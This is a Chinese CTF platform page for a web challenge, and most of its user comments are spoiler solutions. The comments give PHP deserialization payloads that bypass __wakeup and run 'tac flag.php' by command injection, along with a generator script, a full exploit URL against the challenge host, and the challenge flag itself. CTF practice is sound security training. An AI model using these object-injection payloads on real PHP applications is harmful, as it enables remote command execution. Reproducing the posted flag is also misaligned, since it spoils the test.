安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 2158
提  示:
描  述:
flag{}
评论
18956160518 1年前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 1

EtHat 2年前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 2年前

nl flag.php|base64

回复 0

不会编程的崽 2年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 2年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 2年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 2年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 2年前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 2年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

15683956189 3年前

特别要注意下url编码的问题

回复 0

WriteUp

image
小赵同学

3 金币

评分(4)

解题动态

hbynb 攻破了该题 1天前
不知道不晓得 攻破了该题 1天前
Zhengzanmei 攻破了该题 2天前
邪恶的番茄 攻破了该题 2天前
out不慢 攻破了该题 3天前
铭风 攻破了该题 3天前
zrc2682 攻破了该题 4天前
辛笙 攻破了该题 4天前
ycwh 攻破了该题 7天前
cccczz 攻破了该题 8天前
Blmn 攻破了该题 9天前
caocao 攻破了该题 10天前
ysy126 攻破了该题 12天前
南交混的入朱靖宇 攻破了该题 12天前
zzt1 攻破了该题 14天前
奔跑的开开 攻破了该题 14天前
对对对对对对对对 攻破了该题 15天前
几道达瓦 攻破了该题 15天前
zhenmingshui 攻破了该题 16天前
flewing 攻破了该题 17天前
问题反馈